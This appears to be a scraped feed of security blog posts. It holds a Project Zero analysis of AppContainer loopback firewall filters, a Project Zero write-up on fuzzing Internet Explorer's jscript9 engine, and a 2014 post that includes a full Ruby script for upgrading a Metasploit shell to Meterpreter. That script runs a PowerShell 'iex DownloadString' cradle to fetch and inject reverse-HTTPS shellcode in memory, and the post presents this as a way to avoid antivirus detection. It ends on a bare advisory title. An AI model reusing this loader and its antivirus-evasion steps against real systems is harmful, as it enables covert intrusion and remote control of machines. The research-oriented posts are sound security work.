One of the specific restrictions imposed on AppContainer applications is blocking access to localhost. The purpose of this is it makes it more difficult to exploit local network services which might not correctly handle AppContainer callers creating a sandbox escape. Let's test the behavior out and try to connect to a localhost service.

PS> $token = Get-NtToken -LowBox -PackageSid "LOOPBACK"

PS> Invoke-NtToken $token {

Β  Β  [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

Exception calling ".ctor" with "2" argument(s): "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because

connected host has failed to respond 127.0.0.1:445"

If you compare the error to when we tried to connect to an internet address without the appropriate capability you'll notice it's different. When we connected to the internet we got an immediate error indicating that access isn't permitted. However, for localhost we instead get a timeout error, which is preceded by multi-second delay. Why the difference? Getting the network event which corresponds to the connection and displaying the blocking filter shows something interesting.

PS> Get-FwFilter -Id 69039 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name Β  Β  Β  : AppContainerLoopback

Action Type: Block

Key Β  Β  Β  Β : a58394b7-379c-43ac-aa07-9b620559955e

Id Β  Β  Β  Β  : 69039

Description: AppContainerLoopback

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags Β  Β  Β : None

Weight Β  Β  : 18446744073709551614

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  MatchType Β  Value

------------ Β  Β  Β  Β  Β  Β  Β  --------- Β  -----

FWPM_CONDITION_FLAGS Β  Β  Β  FlagsAllSet IsLoopback

FWPM_CONDITION_ALE_USER_ID Equal Β  Β  Β 

O:LSD:(A;;CC;;;AC)(A;;CC;;;S-1-15-3-1)(A;;CC;;;S-1-15-3-2)...

<Owner> : NT AUTHORITY\LOCAL SERVICE

<DACL>

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES...

APPLICATION PACKAGE AUTHORITY\Your Internet connection...

APPLICATION PACKAGE AUTHORITY\Your Internet connection, including...

APPLICATION PACKAGE AUTHORITY\Your home or work networks...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Match)

Everyone: (Allowed)(None)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(None)(Match)

The blocking filter is not in the connect layer as you might expect, instead it's in the receive/accept layer. This explains why we get a timeout rather than immediate failure: the β€œinbound” connection request is being dropped as per the default configuration. This means the TCP client waits for the response from the server, until it eventually hits the timeout limit.

The second interesting thing to note about the filter is it's not based on an IP address such as 127.0.0.1. Instead it's using a condition which checks for the IsLoopback condition flag (FWP_CONDITION_FLAG_IS_LOOPBACKΒ in the SDK). This flag indicates that the connection is being made through the built-in loopback network, regardless of the destination address. Even if you access the public IP addresses for the local network interfaces the packets will still be routed through the loopback network and the condition flag will be set.

The user ID check is odd, in that the security descriptor matches either AppContainer or non-AppContainer processes. This is of course the point, if it didn't match both then it wouldn't block the connection. However, it's not immediately clear what its actual purpose is if it just matches everything. In my opinion, it adds a risk that the filter will be ignored if the socket creator has disabled the Everyone group. Β This condition was modified for supporting LPAC over Windows 8, so it's presumably intentional.

You might ask, if the filter would block any loopback connection regardless of whether it's in an AppContainer, how do loopback connections work for normal applications? Wouldn't this filter always match and block the connection? Β Unsurprisingly there are some additional permit filters before the blocking filter as shown below.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match AppContainerLoopback | Format-FwFilter

Name Β  Β  Β  : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName Β  Β  Β  Β  MatchType Β  Value

------------ Β  Β  Β  Β  --------- Β  -----

FWPM_CONDITION_FLAGS FlagsAllSet IsAppContainerLoopback

Name Β  Β  Β  : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName Β  Β  Β  Β  MatchType Β  Value

------------ Β  Β  Β  Β  --------- Β  -----

FWPM_CONDITION_FLAGS FlagsAllSet IsReserved

Name Β  Β  Β  : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName Β  Β  Β  Β  MatchType Β  Value

------------ Β  Β  Β  Β  --------- Β  -----

FWPM_CONDITION_FLAGS FlagsAllSet IsNonAppContainerLoopback

The three filters shown above only check for different condition flags, and you can find documentation for the flags on MSDN. Starting at the bottom we have a check for IsNonAppContainerLoopback. This flag is set on a connection when the loopback connection is between non-AppContainer created sockets. This filter is what grants normal applications loopback access. It's also why an application can listen on localhost even if it's not granted access to receive connections from the network in the firewall configuration.

In contrast the first filter checks for the IsAppContainerLoopback flag. Based on the documentation and the name, you might assume this would allow any AppContainer to use loopback to any other. However, based on testing this flag is only set if the two AppContainers have the same package SID. This is presumably to allow an AppContainer to communicate with itself or other processes within its package through loopback sockets.

This flag is also, I suspect, the reason that connecting to a loopback socket is handled in the receive layer rather than the connect layer. Perhaps WFP can't easily tell ahead of time whether both the connecting and receiving sockets will be in the same AppContainer package, so it delays resolving that until the connection has been received. This does lead to the unfortunate behavior that blocked loopback sockets timeout rather than fail immediately.

The final flag, IsReservedΒ is more curious. MSDN of course says this is β€œReserved for future use.”, and the future is now. Though checking back at the filters in Windows 8.1 also shows it being used, so if it was reserved it wasn't for very long. The obvious conclusion is this flag is really a β€œMicrosoft Reserved” flag, by that I mean it's actually used but Microsoft is yet unwilling to publicly document it.

What is it used for? AppContainers are supposed to be a capability based system, where you can just add new capabilities to grant additional privileges. It would make sense to have a loopback capability to grant access, which could be restricted to only being used for debugging purposes. However, it seems that loopback access was so beyond the pale for the designers that instead you can only grant access for debug purposes through an administrator only API. Perhaps it's related?

PS> Add-AppModelLoopbackException -PackageSid "LOOPBACK"

PS> Get-FwFilter -AleLayer ConnectV4 |

Where-Object Name -Match AppContainerLoopback |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name Β  Β  Β  : AppContainerLoopback

Action Type: CalloutInspection

Key Β  Β  Β  Β : dfe34c0f-84ca-4af1-9d96-8bf1e8dac8c0

Id Β  Β  Β  Β  : 54912247

Description: AppContainerLoopback

Layer Β  Β  Β : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer Β : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags Β  Β  Β : None

Weight Β  Β  : 18446744073709551615

Callout Key: FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4

Conditions :

FieldKeyName Β  Β  Β  Β  Β  Β  Β  MatchType Value

------------ Β  Β  Β  Β  Β  Β  Β  --------- -----

FWPM_CONDITION_ALE_USER_ID Equal Β  Β  D:(A;NP;CC;;;WD)(A;NP;CC;;;AN)(A;NP;CC;;;S-1-15-3-1861862962-...

<DACL>

Everyone: (Allowed)(NoPropagateInherit)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(NoPropagateInherit)(Match)

PACKAGE CAPABILITY\LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

First we add a loopback exemption for the LOOPBACKΒ package name. We then look for the AppContainerLoopback filters in the connect layer. The one we're interested in is shown. The first thing to note is that the action type is set to CalloutInspection. This might seem slightly surprising, you would expect it'd do something more than inspecting the traffic.

The name of the callout, FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4Β gives the game away. The fact that it has RESERVEDΒ in the name can't be a coincidence. This callout is one implemented internally by Windows in the TCPIP!WfpAlepDbgLowboxSetByPolicyLoopbackCalloutClassifyΒ function. This name now loses all mystery and pretty much explains what its purpose is, which is to configure the connection so that the IsReserved flag is set when the receive layer processes it.

The user ID here is equally important. When you register the loopback exemption you only specify the package SID, which is shown in the output as the last β€œLOOPBACK” line. Therefore you'd assume you'd need to always run your code within that package. However, the penultimate line is β€œPACKAGE CAPABILITY\LOOPBACK” which is my module's way of telling you that this is the package SID, but converted to a capability SID. This is basically changing the first relative identifier in the SID from 2 to 3.

We can use this behavior to simulate a generic loopback exemption capability. It allows you to create an AppContainer sandboxed process which has access to localhost which isn't restricted to a particular package. This would be useful for applications such as Chrome to implement a network facing sandboxed process and would work from Windows 8 through 11.Β . Unfortunately it's not officially documented so can't be relied upon. An example demonstrating the use of the capability is shown below.

PS> $cap = Get-NtSid -PackageSid "LOOPBACK" -AsCapability

PS> $token = Get-NtToken -LowBox -PackageSid "TEST" -cap $cap

PS> $sock = Invoke-NtToken $token {

Β  Β  [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

PS> $sock.Client.RemoteEndPoint

AddressFamily Address Β  Port

------------- ------- Β  ----

Β InterNetwork 127.0.0.1 Β 445

Conclusions

That wraps up my quick overview of how AppContainer network restrictions are implemented using the Windows Firewall. I covered the basics of the Windows Firewall as well as covered some of my tooling I wrote to do analysis of the configuration. This background information allowed me to explain why theΒ issueΒ I reported to Microsoft worked. I also pointed out some of the quirks of the implementation which you might find of interest.

Having a good understanding of how a security feature works is an important step towards finding security issues. I hope that by providing both the background and tooling other researchers can also find similar issues and try and get them fixed.

Fuzzing Closed-Source JavaScript Engines with Coverage Feedback

By: Ryan
14 September 2021 at 17:14

Posted by Ivan Fratric, Project Zero

tl;dr I combined FuzzilliΒ (an open-source JavaScript engine fuzzer), with TinyInstΒ (an open-source dynamic instrumentation library for fuzzing). I also added grammar-based mutation support to JackalopeΒ (my black-box binary fuzzer). So far, these two approaches resulted in finding three security issues in jscript9.dll (default JavaScript engine used by Internet Explorer).

Introduction or β€œwhen you can’t beat them, join them”

In the past, I’ve invested a lot of time in generation-based fuzzing, which was a successful way to find vulnerabilities in various targets, especially those that take some form of language as input. For example, Domato, my grammar-based generational fuzzer, found over 40 vulnerabilities in WebKitΒ and numerous bugs in Jscript.Β 

While generation-based fuzzing is still a good way to fuzz many complex targets, it was demonstrated that, for finding vulnerabilities in modern JavaScript engines, especially engines with JIT compilers, better results can be achieved with mutational, coverage-guided approaches. My colleague Samuel Groß gives a compelling case on why that is in his OffensiveCon talk. Samuel is also the author of Fuzzilli, an open-source JavaScript engine fuzzer based on mutating a custom intermediate language. Fuzzilli has found a large number of bugs in various JavaScript engines.

While there has been a lot of development on coverage-guided fuzzers over the last few years, most of the public tooling focuses on open-source targets or software running on the Linux operating system. Meanwhile, I focused on developing tooling for fuzzing of closed-source binaries on operating systems where such software is more prevalent (currently Windows and macOS). Some years back, I published WinAFL, the first performant AFL-based fuzzer for Windows. About a year and a half ago, however, I started working on a brand new toolset for black-box coverage-guided fuzzing. TinyInstΒ and JackalopeΒ are the two outcomes of this effort.

It comes somewhat naturally to combine the tooling I’ve been working on with techniques that have been so successful in finding JavaScript bugs, and try to use the resulting tooling to fuzz JavaScript engines for which the source code is not available. Of such engines, I know two: jscript and jscript9 (implemented in jscript.dll and jscript9.dll) on Windows, which are both used by the Internet Explorer web browser. Of these two, jscript9 is probably more interesting in the context of mutational coverage-guided fuzzing since it includes a JIT compiler and more advanced engine features.

While you might think that Internet Explorer is a thing of the pastΒ and it doesn’t make sense to spend energy looking for bugs in it, the fact remains that Internet Explorer is still heavily exploited by real-world attackers. In 2020Β there were two Internet Explorer 0days exploited in the wild and three in 2021Β so far. One of these vulnerabilities was in the JIT compiler of jscript9. I’ve personally vowed several times that I’m done looking into Internet Explorer, but each time, more 0days in the wild pop up and I change my mind.

Additionally, the techniques described here could be applied to any closed-source or even open-source software, not just Internet Explorer. In particular, grammar-based mutational fuzzing described two sections down can be applied to targets other than JavaScript engines by simply changing the input grammar.

Approach 1: Fuzzilli + TinyInst

Fuzzilli, as said above, is a state-of-the-art JavaScript engine fuzzer and TinyInstΒ is a dynamic instrumentation library. Although TinyInst is general-purpose and could be used in other applications, it comes with various features useful for fuzzing, such as out-of-the-box support for persistent fuzzing, various types of coverage instrumentations etc. TinyInst is meant to be simple to integrate with other software, in particular fuzzers, and has already been integrated with some.

So, integrating with Fuzzilli was meant to be simple. However, there were still various challenges to overcome for different reasons:

Challenge 1: Getting Fuzzilli to build on Windows where our targets are.

Edit 2021-09-20: The version of Swift for Windows used in this project was from January 2021, when I first started working on it. Since version 5.4, Swift Package Manager is supported on Windows, so building Swift code should be much easier now. Additionally, static linking is supported for C/C++ code.

Fuzzilli was written in Swift and the support for Swift on Windows is currently not great. While Swift on WindowsΒ buildsΒ exist (I’m linking to the builds by Saleem Abdulrasool instead of the official ones because the latter didn’t work for me), not all features that you would find on Linux and macOS are there. For example, one does not simply run swift buildΒ on Windows, as the build system is one of the features that didn’t get ported (yet). Fortunately, CMake and Ninja Β support Swift, so the solution to this problem is to switch to the CMake build system. There are helpful examplesΒ on how to do this, once again from Saleem Abdulrasool.

Another feature that didn’t make it to Swift for Windows is statically linking libraries. This means that all libraries (such as those written in C and C++ that the user wants to include in their Swift project) need to be dynamically linked. This goes for libraries already included in the Fuzzilli project, but also for TinyInst. Since TinyInst also uses the CMake build system, my first attempt at integrating TinyInst was to include it via the Fuzzilli CMake project, and simply have it built as a shared library. However, the same tooling that was successful in building Fuzzilli would fail to build TinyInst (probably due to various platform libraries TinyInst uses). That’s why, in the end, TinyInst was being built separately into a .dll and this .dll loaded β€œmanually” into Fuzzilli via the LoadLibraryΒ API. This turned out not to be so bad - Swift build tooling for Windows was quite slow, and so it was much faster to only build TinyInst when needed, rather than build the entire Fuzzilli project (even when the changes made were minor).

The Linux/macOS parts of Fuzzilli, of course, also needed to be rewritten. Fortunately, it turned out that the parts that needed to be rewritten were the parts written in C, and the parts written in Swift worked as-is (other than a couple of exceptions, mostly related to networking). As someone with no previous experience with Swift, this was quite a relief. The main parts that needed to be rewritten were the networking library (libsocket), the library used to run and monitor the child process (libreprl) and the library for collecting coverage (libcoverage). The latter two were changed to use TinyInst. Since these are separate libraries in Fuzzilli, but TinyInst handles both of these tasks, some plumbing through Swift code was needed to make sure both of these libraries talk to the same TinyInst instance for a given target.

Challenge 2: Threading woes

Another feature that made the integration less straightforward than hoped for was the use of threading in Swift. TinyInst is built on a custom debugger and, on Windows, it uses the Windows debugging API. One specific feature of the Windows debugging API, for example WaitForDebugEvent, is that it does not take a debugee pid or a process handle as an argument. So then, the question is, if you have multiple debugees, to which of them does the API call refer? The answer to that is, when a debugger on Windows attaches to a debugee (or starts a debugee process), the threadΒ  that started/attached it is the debugger. Any subsequent calls for that particular debugee need to be issued on that same thread.

In contrast, the preferred Swift coding style (that Fuzzilli also uses) is to take advantage of threading primitives such as DispatchQueue. When tasks get posted on a DispatchQueue, they can run in parallel on β€œbackground” threads. However, with the background threads, there is no guarantee that a certain task is always going to run on the same thread. So it would happen that calls to the same TinyInst instance happened from different threads, thus breaking the Windows debugging model. This is why, for the purposes of this project, TinyInst was modified to create its own thread (one for each target process) and ensure that any debugger calls for a particular child process always happen on that thread.

Various minor changes

Some examples of features Fuzzilli requires that needed to be added to TinyInst are stdin/stdoutΒ redirection and a channel for reading out the β€œstatus” of JavaScript execution (specifically, to be able to tell if JavaScript code was throwing an exception or executing successfully). Some of these features were already integrated into the β€œmainline” TinyInst or will be integrated in the future.

After all of that was completed though, the Fuzzilli/Tinyinst hybrid was running in a stable manner:

Note that coverage percentage reported by Fuzzilli is incorrect. Because TinyInst is a dynamic instrumentation library, it cannot know the number of basic blocks/edges in advance.

Primarily because of the current Swift on Windows issues, this closed-source mode of Fuzzilli is not something we want to officially support. However, the sources and the build we used can be downloaded here.

Approach 2: Grammar-based mutation fuzzing with Jackalope

JackalopeΒ is a coverage-guided fuzzer I developed for fuzzing black-box binaries on Windows and, recently, macOS. Jackalope initially included mutators suitable for fuzzing of binary formats. However, a key feature of Jackalope is modularity: it is meant to be easy to plug in or replace individual components, including, but not limited to, sample mutators.

After observing how Fuzzilli works more closely during Approach 1, as well as observing samples it generated and the bugs it found, the idea was to extend Jackalope to allow mutational JavaScript fuzzing, but also in the future, mutational fuzzing of other targets whose samples can be described by a context-free grammar.

Jackalope uses a grammar syntax similar to that of Domato, but somewhat simplified (with some features not supported at this time). This grammar format is easy to write and easy to modify (but also easy to parse). The grammar syntax, as well as the list of builtin symbols, can be found on this pageΒ and the JavaScript grammar used in this project can be found here.

One addition to the Domato grammar syntax that allows for more natural mutations, but also sample minimization, are the <repeat_*>Β grammar nodes. A <repeat_x>Β symbol tells the grammar engine that it can be represented as zero or more <x>Β nodes. For example, in our JavaScript grammar, we have

<statementlist> = <repeat_statement>

telling the grammar engine that <statementlist>Β can be constructed by concatenating zero or more <statement>s. In our JavaScript grammar, a <statement>Β expands to an actual JavaScript statement. This helps the mutation engine in the following way: it now knows it can mutate a sample by inserting another <statement>Β node anywhere in the <statementlist>Β node. It can also remove <statement>Β nodes from the <statementlist>Β node. Both of these operations will keep the sample valid (in the grammar sense).

It’s not mandatory to have <repeat_*>Β nodes in the grammar, as the mutation engine knows how to mutate other nodes as well (see the list of mutations below). However, including them where it makes sense might help make mutations in a more natural way, as is the case of the JavaScript grammar.

Internally, grammar-based mutation works by keeping a tree representation of the sample instead of representing the sample just as an array of bytes (Jackalope must in fact represent a grammar sample as a sequence of bytes at some points in time, e.g when storing it to disk, but does so by serializing the tree and deserializing when needed). Mutations work by modifying a part of the tree in a manner that ensures the resulting tree is still valid within the context of the input grammar. Minimization works by removing those nodes that are determined to be unnecessary.

Jackalope’s mutation engine can currently perform the following operations on the tree:

  • Generate a new tree from scratch. This is not really a mutation and is mainly used to bootstrap the fuzzers when no input samples are provided. In fact, grammar fuzzing mode in Jackalope must either start with an empty corpus or a corpus generated by a previous session. This is because there is currently no way to parse a text file (e.g. a JavaScript source file) into its grammar tree representation (in general, there is no guaranteed unique way to parse a sample with a context-free grammar).
  • Select a random node in the sample's tree representation. Generate just this node anew while keeping the rest of the tree unchanged.
  • Splice: Select a random node from the current sample and a node with the same symbol from another sample. Replace the node in the current sample with a node from the other sample.
  • Repeat node mutation: One or more new children get added to a <repeat_*>Β node, or some of the existing children get replaced.
  • Repeat splice: Selects a <repeat_*>Β node from the current sample and a similar <repeat_*>Β node from another sample. Mixes children from the other node into the current node.

JavaScript grammar was initially constructed by following Β the ECMAScript 2022 specification. However, as always when constructing fuzzing grammars from specifications or in a (semi)automated way, this grammar was only a starting point. More manual work was needed to make the grammar output valid and generate interesting samples more frequently.

Jackalope now supportsΒ grammar fuzzing out-of-the box, and, in order to use it, you just need to add -grammar <path_to_grammar_file>Β to Jackalope’s command lines. In addition to running against closed-source targets on Windows and macOS, Jackalope can now run against open-source targets on Linux using Sanitizer CoverageΒ based instrumentation. This is to allow experimentation with grammar-based mutation fuzzing on open-source software.

The following image shows Jackalope running against jscript9.

Jackalope running against jscript9.

Results

I ran Fuzzilli for several weeks on 100 cores. This resulted in finding two vulnerabilities, CVE-2021-26419Β and CVE-2021-31959. Note that the bugs that were analyzed and determined not to have security impact are not counted here. Both of the vulnerabilities found were in the bytecode generator, a part of the JavaScript engine that is typically not very well tested by generation-based fuzzing approaches. Both of these bugs were found relatively early in the fuzzing process and would be findable even by fuzzing on a single machine.

The second of the two bugs was particularly interesting because it initially manifested only as a NULL pointer dereference that happened occasionally, and it took quite a bit of effort (including tracing JavaScript interpreter execution in cases where it crashed and in cases where it didn’t to see where the execution flow diverges) to reach the root cause. Time travel debuggingΒ was also useful here - it would be quite difficult if not impossible to analyze the sample without it. The reader is referred to the vulnerability reportΒ for further details about the issue.

Jackalope was run on a similar setup: for several weeks on 100 cores. Interestingly, at least against jscript9, Jackalope with grammar-based mutations behaved quite similarly to Fuzzilli: it was hitting a similar level of coverage and finding similar bugs. It also found CVE-2021-26419 quickly into the fuzzing process. Of course, it’s easy to re-discover bugs once they have already been found with another tool, but neither the grammar engine nor the JavaScript grammar contain anything specifically meant for finding these bugs.

About a week and a half into fuzzing with Jackalope, it triggered a bug I hadn't seen before, CVE-2021-34480. This time, the bug was in the JIT compiler, which is another component not exercised very well with generation-based approaches. I was quite happy with this find, because it validated the feasibility of a grammar-based approach for finding JIT bugs.

Limitations and improvement ideas

While successful coverage-guided fuzzing of closed-source JavaScript engines is certainly possible as demonstrated above, it does have its limitations. The biggest one is inability to compile the target with additional debug checks. Most of the modern open-source JavaScript engines include additional checks that can be compiled in if needed, and enable catching certain types of bugs more easily, without requiring that the bug crashes the target process. If jscript9 source code included such checks, they are lost in the release build we fuzzed.

Related to this, we also can’t compile the target with something like Address Sanitizer. The usual workaround for this on Windows would be to enable Page HeapΒ for the target. However, it does not work well here. The reason is, jscript9 uses a custom allocator for JavaScript objects. As Page Heap works by replacing the default malloc(), it simply does not apply here.

A way to get around this would be to use instrumentation (TinyInst is already a general-purpose instrumentation library so it could be used for this in addition to code coverage) to instrument the allocator and either insert additional checks or replace it completely. However, doing this was out-of-scope for this project.

Conclusion

Coverage-guided fuzzing of closed-source targets, even complex ones such as JavaScript engines is certainly possible, and there are plenty of tools and approaches available to accomplish this.

In the context of this project, Jackalope fuzzer was extended to allow grammar-based mutation fuzzing. These extensions have potential to be useful beyond just JavaScript fuzzing and can be adapted to other targets by simply using a different input grammar. It would be interesting to see which other targets the broader community could think of that would benefit from a mutation-based approach.

Finally, despite being targeted by security researchers for a long time now, Internet Explorer still has many exploitable bugs that can be found even without large resources. After the development on this project was complete, Microsoft announced that they will be removing Internet Explorer as a separate browser. This is a good first step, but with Internet Explorer (or Internet Explorer engine) integrated into various otherΒ products (most notably, Microsoft Office, as also exploited by in-the-wild attackers), I wonder how long it will truly take before attackers stop abusing it.

introduction

3 March 2014 at 05:51

This isn’t a real introduction post, just a note that I’m migrating from Google Blogger to Github Pages with Octopress. So far it’s great. I’m going to be slowly migrating all posts over from Blogger into here, though I may skip a few early posts that aren’t as interesting.

Hopefully it provides me with the functionality that I’ve been looking for.

meterpreter shell upgrades using powershell

11 March 2014 at 04:31

One of my primary goals during development of clusterd was ensuring reliability and covertness during remote deploys. It’s no secret that antivirus routinely eats vanilla meterpreter shells. For this, the --gen-payload flag generates a war file with java/jsp_shell_reverse_tcp tucked inside. This is used due to it being largely undetected by AV, and our environments are perfectly suited for it. However, Meterpreter is a fantastic piece of software, and it’d be nice to be able to elevate from this simple JSP shell into it.

Metasploit has a solution for this, sort of. sessions -u can be used to upgrade an existing shell session into a full-blown Meterpreter. Unfortunately, the current implementation uses Rex::Exploitation::CmdStagerVBS, which writes the executable to disk and executes it. This is almost always immediately popped by most enterprise-grade (and even most consumer grade) AV’s. For this, we need a new solution.

The easiest solution is Powershell; this allows us to execute shellcode completely in-memory, without ever bouncing files against disk. I used Obscure Security’s canonical post on it for my implementation. The only problem really is portability, as Powershell doesn’t exist on Windows XP. This could be mitigated by patching in shellcode via Java, but that’s another post for another time.

Right, so how’s this work? We essentially execute a Powershell command in the running session (our generic shell) that fetches a payload from a remote server and executes it. Our payload in this case is Invoke-Shellcode, from the PowerSploit package. This bit of code will generate our reverse HTTPS meterpreter shell and inject it into the current process ID. Our command looks like this:

1
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc %s"

Our encoded payload is:

1
iex (New-Object Net.WebClient).DownloadString('http://%s:%s/')

IEX, or Invoke-Expression, is just an eval operation. In this case, we’re fetching a URL and executing it. This is a totally transparent, completely in-memory solution. Let’s have a look at it running:

1
2
3
4
5
6
7
8
9
10
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type         Information                                                                       Connection
  --  ----         -----------                                                                       ----------
  1   shell linux  Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  192.168.1.6:4444 -> 192.168.1.102:60911 (192.168.1.102)

msf exploit(handler) > 

We see above that we currently have a generic shell (it’s the java/jsp_shell_reverse_tcp payload) on a Windows 7 system (which happens to be running MSE). Using this new script, we can upgrade this session to Meterpreter:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf exploit(handler) > sessions -u 1

[*] Started HTTPS reverse handler on https://0.0.0.0:53568/
[*] Starting the payload handler...
[*] 192.168.1.102:60922 Request received for /INITM...
[*] 192.168.1.102:60922 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 2 opened (192.168.1.6:53568 -> 192.168.1.102:60922) at 2014-03-11 23:09:36 -0600
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : BRYAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

And just like that, without a peep from MSE, we’ve got a Meterpreter shell.

You can find the code for this implementation below, though be warned; this is PoC quality code, and probably even worse as I’m not really a Ruby developer. Meatballs over at Metasploit has a few awesome Powershell pull requests waiting for a merge. Once this is done, I can implement that here and submit a proper implementation. If you’d like to try this out, simply create a backup copy of scripts/shell/spawn_meterpreter.rb and copy in the following, then reload. You should be upgradin’ and bypassin’ in no time.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
#
# Session upgrade using Powershell IEX
# 
# Some code stolen from jduck's original implementation
#
# -drone
#

class HTTPServer
    #
    # Using Ruby HTTPServer here since this isn't a module, and I can't figure
    # out how to use MSF libs in here
    #
    @sent = false
    def state
        return @sent
    end

    def initialize(port, body)
        require 'socket'

        @sent = false
        @server = Thread.new do
            server = TCPServer.open port
            loop do
                client = server.accept
                content_type = "text/plain"
                client.puts "HTTP/1.0 200 OK\r\nContent-type: #{content_type}"\
                            "\r\nContent-Length: #{body.length}\r\n\r\n#{body}"\
                            "\r\n\r\n"
                sleep 5
                client.close
                kill
            end
        end
     end

     def kill!
        @sent = true
        @server.kill
     end

     alias :kill :kill!
end

#
# Returns if a port is used by a session
#
def is_port_used?(port)
    framework.sessions.each do |sid, obj|
       local_info = obj.instance_variable_get(:@local_info)
       return true if local_info =~ /:#{port}$/
    end

    false
end

def start_http_service(port)
    @server = HTTPServer.new(port, @pl)
end

def wait_payload

    waited = 0
    while (not @server.state)
        select(nil, nil, nil, 1)
        waited += 1
        if (waited > 10) # MAGIC NUMBA
            @server.kill
            raise RuntimeError, "No payload requested"
        end
    end
end

def generate(host, port, sport)
    require 'net/http'

    script_block = "iex (New-Object Net.WebClient).DownloadString('http://%s:%s/')" % [host, sport]
    cmd = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol %s" % script_block

    # generate powershell payload
    url = URI.parse('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
    req = Net::HTTP::Get.new(url.path)
    http = Net::HTTP.new(url.host, url.port)
    http.use_ssl = true

    res = http.request(req)

    if !res or res.code != '200'
      raise RuntimeError, "Could not retrieve Invoke-Shellcode"
    end

    @pl = res.body
    @pl << "\nInvoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force" % [host, port]
    return cmd
end


#
# Mimics what MSF already does if the user doesn't manually select a payload and lhost
#
lhost = framework.datastore['LHOST']
unless lhost
  lhost = Rex::Socket.source_address
end

#
# If there is no LPORT defined in framework, then pick a random one that's not used
# by current sessions. This is possible if the user assumes module datastore options
# are the same as framework datastore options.
#
lport = framework.datastore['LPORT']
unless lport
  lport = 4444 # Default meterpreter port
  while is_port_used?(lport)
    # Pick a port that's not used
    lport = [*49152..65535].sample
  end
end

# do the same from above, but for the server port
sport = [*49152..65535].sample
while is_port_used?(sport)
    sport = [*49152..65535].sample
end

# maybe we want our sessions going to another instance?
use_handler = true
use_handler = nil if (session.exploit_datastore['DisablePayloadHandler'] == true)

#
# Spawn the handler if needed
#
aborted = false
begin

  mh = nil
  payload_name = 'windows/meterpreter/reverse_https'
  if (use_handler)
      mh = framework.modules.create("exploit/multi/handler")
      mh.datastore['LPORT'] = lport
      mh.datastore['LHOST'] = lhost
      mh.datastore['PAYLOAD'] = payload_name
      mh.datastore['ExitOnSession'] = false
      mh.datastore['EXITFUNC'] = 'process'
      mh.exploit_simple(
        'LocalInput'     => session.user_input,
        'LocalOutput'    => session.user_output,
        'Payload'        => payload_name,
        'RunAsJob'       => true)
      # It takes a little time for the resources to get set up, so sleep for
      # a bit to make sure the exploit is fully working.  Without this,
      # mod.get_resource doesn't exist when we need it.
      select(nil, nil, nil, 0.5)
      if framework.jobs[mh.job_id.to_s].nil?
        raise RuntimeError, "Failed to start multi/handler - is it already running?"
      end
    end

    # Generate our command and payload
    cmd = generate(lhost, lport, sport)

    # start http service
    start_http_service(sport)

    sleep 2 # give it a sec to startup

    # execute command
    session.run_cmd(cmd)

    if not @server.state
        # wait...
        wait_payload
    end

rescue ::Interrupt
  # TODO: cleanup partial uploads!
  aborted = true
rescue => e
  print_error("Error: #{e}")
  aborted = true
end

#
# Stop the job
#
if (use_handler)
  Thread.new do
    if not aborted
      # Wait up to 10 seconds for the session to come in..
      select(nil, nil, nil, 10)
    end
    framework.jobs.stop_job(mh.job_id)
  end
end

Update 09/06/2014

Tom Sellers submitted a PR on 05/29 that implements the above nicely. It appears to support a large swath of platforms, but only a couple support no-disk-write methods, namely the Powershell method.

IBM Tealeaf CX (v8 Release 8) Remote OS Command Injection / LFI

27 March 2014 at 05:51

